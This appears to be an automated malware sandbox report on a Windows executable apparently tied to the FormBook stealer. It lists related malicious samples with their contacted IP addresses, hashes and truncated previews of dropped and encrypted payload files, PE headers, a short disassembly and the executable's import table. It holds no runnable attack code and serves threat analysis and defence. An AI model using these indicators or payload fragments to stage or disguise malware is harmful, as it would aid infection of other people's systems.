                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                        • 38.54.112.227
                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                        • 154.90.58.209
                                                        www.ytsd88.topW3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 47.76.213.197
                                                        Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 47.76.213.197
                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                        • 47.76.213.197
                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                        • 47.76.213.197
                                                        PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                        • 47.76.213.197
                                                        Quotation.exeGet hashmaliciousFormBookBrowse
                                                        • 47.76.213.197
                                                        payments.exeGet hashmaliciousFormBookBrowse
                                                        • 47.76.213.197
                                                        Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 47.76.213.197
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        VODAFONE-TRANSIT-ASVodafoneNZLtdNZFIWszl1A8l.exeGet hashmaliciousGhostRatBrowse
                                                        • 47.79.66.76
                                                        armv5l.elfGet hashmaliciousUnknownBrowse
                                                        • 47.79.173.144
                                                        arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 121.74.70.74
                                                        leBwnyHIgx.exeGet hashmaliciousGhostRatBrowse
                                                        • 47.79.48.230
                                                        miori.arm5.elfGet hashmaliciousUnknownBrowse
                                                        • 47.78.226.190
                                                        miori.spc.elfGet hashmaliciousUnknownBrowse
                                                        • 118.95.51.101
                                                        z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 121.74.70.74
                                                        armv4l.elfGet hashmaliciousUnknownBrowse
                                                        • 118.95.125.90
                                                        HGwpjJUqhW.exeGet hashmaliciousGhostRatBrowse
                                                        • 47.79.48.211
                                                        1731043030539.exeGet hashmaliciousReflectiveLoaderBrowse
                                                        • 47.76.199.218
                                                        LINKNET-ID-APLinknetASNIDsora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                        • 139.10.29.3
                                                        arm4.elfGet hashmaliciousMiraiBrowse
                                                        • 139.44.142.78
                                                        momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 139.41.98.162
                                                        armv5l.elfGet hashmaliciousMiraiBrowse
                                                        • 139.34.88.220
                                                        DEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                        • 139.16.152.234
                                                        loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                        • 139.10.78.207
                                                        loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 139.24.67.215
                                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 139.35.229.59
                                                        x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 139.255.236.155
                                                        la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                        • 139.33.26.167
                                                        CNSERVERSUSQmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                        • 172.247.112.164
                                                        arm.elfGet hashmaliciousMiraiBrowse
                                                        • 23.225.101.86
                                                        spc.elfGet hashmaliciousMiraiBrowse
                                                        • 23.225.150.24
                                                        sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 23.225.149.53
                                                        6.elfGet hashmaliciousUnknownBrowse
                                                        • 41.216.185.130
                                                        3.elfGet hashmaliciousUnknownBrowse
                                                        • 41.216.185.178
                                                        2.elfGet hashmaliciousUnknownBrowse
                                                        • 41.216.185.126
                                                        http://www.rr8844.comGet hashmaliciousUnknownBrowse
                                                        • 23.224.82.187
                                                        botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 23.225.125.76
                                                        armv4l.elfGet hashmaliciousMiraiBrowse
                                                        • 103.228.168.192
                                                        AMAZON-02USEIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                        • 13.228.81.39
                                                        invoice_AG60538.pdfGet hashmaliciousUnknownBrowse
                                                        • 143.204.205.214
                                                        bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                        • 18.139.62.226
                                                        OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                        • 54.244.188.177
                                                        QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        frosty.arm.elfGet hashmaliciousMiraiBrowse
                                                        • 18.140.171.98
                                                        frosty.spc.elfGet hashmaliciousMiraiBrowse
                                                        • 54.189.236.62
                                                        Message.emlGet hashmaliciousUnknownBrowse
                                                        • 34.249.87.52
                                                        frosty.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 18.188.126.130
                                                        cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        No context
                                                        No context
                                                        Process:C:\Windows\SysWOW64\winver.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1211596417522893
                                                        Encrypted:false
                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                        MD5:0AB67F0950F46216D5590A6A41A267C7
                                                        SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                        SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                        SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\aBEh0fsi2c.exe
                                                        File Type:packed data
                                                        Category:dropped
                                                        Size (bytes):288256
                                                        Entropy (8bit):7.994807312517926
                                                        Encrypted:true
                                                        SSDEEP:6144:dVqtcuj5pmyVLlQJT2A3max4TvjXn4CeLWfgSAi1+qtnX57T6Loj:LuFQ3x4glLWfgSAi1htnpvIoj
                                                        MD5:0BB697E046F67A8E0A3CC79C0D365B6B
                                                        SHA1:81951876C28897FC2BDFD39F4D94B5B4C18EDCA1
                                                        SHA-256:71838F3FFE2BE533C88E5EFDA130772A302EE7687F4F6F128C0854DDF8D13168
                                                        SHA-512:0210D18BC6A7577DA3B87B2F85B1D5CFDC774877AA05008463511B6407B545D99F2F523DAFEB2C8186FA589BE3FFA8CE56ED05E6B2712DEE5729AEE4538B3EF1
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...U2J3NTNTC..3T.ENNOEFQu0YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRD.U1J=Q.@T.P...D..o.-/".@+'+ %!uR+] ?:t!<nA!+e' o....]6,)|IA_.J3NPNTC O:.x%).r%!..P>.V..oQ-.T...9).N..r/"..\S1u,5.LU1J3NPN..YN.UDE2...FQ50YHLR.LW0A2EPN.GYN3TEENNOuSQ50IHLR4HU1JsNP^TCYL3TCENNOEFQ30YHLRDLUAN3NRNTCYN3VE..NOUFQ%0YHLBDLE1J3NPNDCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50w<)*0LU1.`JPNDCYNgPEE^NOEFQ50YHLRDLU.J3.PNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN
                                                        Process:C:\Users\user\Desktop\aBEh0fsi2c.exe
                                                        File Type:packed data
                                                        Category:dropped
                                                        Size (bytes):288256
                                                        Entropy (8bit):7.994807312517926
                                                        Encrypted:true
                                                        SSDEEP:6144:dVqtcuj5pmyVLlQJT2A3max4TvjXn4CeLWfgSAi1+qtnX57T6Loj:LuFQ3x4glLWfgSAi1htnpvIoj
                                                        MD5:0BB697E046F67A8E0A3CC79C0D365B6B
                                                        SHA1:81951876C28897FC2BDFD39F4D94B5B4C18EDCA1
                                                        SHA-256:71838F3FFE2BE533C88E5EFDA130772A302EE7687F4F6F128C0854DDF8D13168
                                                        SHA-512:0210D18BC6A7577DA3B87B2F85B1D5CFDC774877AA05008463511B6407B545D99F2F523DAFEB2C8186FA589BE3FFA8CE56ED05E6B2712DEE5729AEE4538B3EF1
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...U2J3NTNTC..3T.ENNOEFQu0YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRD.U1J=Q.@T.P...D..o.-/".@+'+ %!uR+] ?:t!<nA!+e' o....]6,)|IA_.J3NPNTC O:.x%).r%!..P>.V..oQ-.T...9).N..r/"..\S1u,5.LU1J3NPN..YN.UDE2...FQ50YHLR.LW0A2EPN.GYN3TEENNOuSQ50IHLR4HU1JsNP^TCYL3TCENNOEFQ30YHLRDLUAN3NRNTCYN3VE..NOUFQ%0YHLBDLE1J3NPNDCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50w<)*0LU1.`JPNDCYNgPEE^NOEFQ50YHLRDLU.J3.PNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.2115039335106275
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:aBEh0fsi2c.exe
                                                        File size:1'183'744 bytes
                                                        MD5:ae1fe8e567226c914dc9a747e25d2118
                                                        SHA1:70db43d604ed9a6da5afb4982d2f0cca238632bd
                                                        SHA256:9351f03cc5e661bf7eb9e279c67c11f05ea78c2cc6c283691218ab43c3e15a06
                                                        SHA512:c7cec826372b746a16894fdea3efd0eec706bfaa097762b3a34c197b6bfeacbfeb8a8c6f3e1d5e9fb017328011518eb4ef8981f784d24950b19fbcb5130824e9
                                                        SSDEEP:24576:5u6J33O0c+JY5UZ+XC0kGso6FaDP4J8D1cyx16DWY:7u0c++OCvkGs9FaDQK1dY
                                                        TLSH:4C45CE2273DEC360CB679173BF69B3056EBF78650630B85B2F980D79A950171262C7A3
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                        Icon Hash:1bb3b3b3b3d389b3
                                                        Entrypoint:0x427dcd
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x675C5E25 [Fri Dec 13 16:17:41 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                        Instruction
                                                        call 00007F9208DAB10Ah
                                                        jmp 00007F9208D9DED4h
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push edi
                                                        push esi
                                                        mov esi, dword ptr [esp+10h]
                                                        mov ecx, dword ptr [esp+14h]
                                                        mov edi, dword ptr [esp+0Ch]
                                                        mov eax, ecx
                                                        mov edx, ecx
                                                        add eax, esi
                                                        cmp edi, esi
                                                        jbe 00007F9208D9E05Ah
                                                        cmp edi, eax
                                                        jc 00007F9208D9E3BEh
                                                        bt dword ptr [004C31FCh], 01h
                                                        jnc 00007F9208D9E059h
                                                        rep movsb
                                                        jmp 00007F9208D9E36Ch
                                                        cmp ecx, 00000080h
                                                        jc 00007F9208D9E224h
                                                        mov eax, edi
                                                        xor eax, esi
                                                        test eax, 0000000Fh
                                                        jne 00007F9208D9E060h
                                                        bt dword ptr [004BE324h], 01h
                                                        jc 00007F9208D9E530h
                                                        bt dword ptr [004C31FCh], 00000000h
                                                        jnc 00007F9208D9E1FDh
                                                        test edi, 00000003h
                                                        jne 00007F9208D9E20Eh
                                                        test esi, 00000003h
                                                        jne 00007F9208D9E1EDh
                                                        bt edi, 02h
                                                        jnc 00007F9208D9E05Fh
                                                        mov eax, dword ptr [esi]
                                                        sub ecx, 04h
                                                        lea esi, dword ptr [esi+04h]
                                                        mov dword ptr [edi], eax
                                                        lea edi, dword ptr [edi+04h]
                                                        bt edi, 03h
                                                        jnc 00007F9208D9E063h
                                                        movq xmm1, qword ptr [esi]
                                                        sub ecx, 08h
                                                        lea esi, dword ptr [esi+08h]
                                                        movq qword ptr [edi], xmm1
                                                        lea edi, dword ptr [edi+08h]
                                                        test esi, 00000007h
                                                        je 00007F9208D9E0B5h
                                                        bt esi, 03h
                                                        jnc 00007F9208D9E108h
                                                        Programming Language:
                                                        • [ASM] VS2013 build 21005
                                                        • [ C ] VS2013 build 21005
                                                        • [C++] VS2013 build 21005
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ASM] VS2013 UPD4 build 31101
                                                        • [RES] VS2013 build 21005
                                                        • [LNK] VS2013 UPD4 build 31101
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x586d4.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1200000x711c.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xc70000x586d40x588002c08d5b9a8f21f6a3142e9f435cb3254False0.9749459304378532data7.970284768155938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x1200000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xc74580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                        RT_ICON0xc75800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                        RT_ICON0xc76a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                        RT_ICON0xc77d00x151aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8863383931877082
                                                        RT_MENU0xc8cec0x50dataEnglishGreat Britain0.9
                                                        RT_STRING0xc8d3c0x594dataEnglishGreat Britain0.3333333333333333
                                                        RT_STRING0xc92d00x68adataEnglishGreat Britain0.2747909199522103
                                                        RT_STRING0xc995c0x490dataEnglishGreat Britain0.3715753424657534
                                                        RT_STRING0xc9dec0x5fcdataEnglishGreat Britain0.3087467362924282
                                                        RT_STRING0xca3e80x65cdataEnglishGreat Britain0.34336609336609336
                                                        RT_STRING0xcaa440x466dataEnglishGreat Britain0.3605683836589698
                                                        RT_STRING0xcaeac0x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                        RT_RCDATA0xcb0040x541b1data1.000336722816164
                                                        RT_GROUP_ICON0x11f1b80x14dataEnglishGreat Britain1.2
                                                        RT_GROUP_ICON0x11f1cc0x14dataEnglishGreat Britain1.25
                                                        RT_GROUP_ICON0x11f1e00x14dataEnglishGreat Britain1.15
                                                        RT_GROUP_ICON0x11f1f40x14dataEnglishGreat Britain1.25
                                                        RT_VERSION0x11f2080xdcdataEnglishGreat Britain0.6181818181818182
                                                        RT_MANIFEST0x11f2e40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                        DLLImport
                                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                        PSAPI.DLLGetProcessMemoryInfo
                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                        UxTheme.dllIsThemeActive
                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
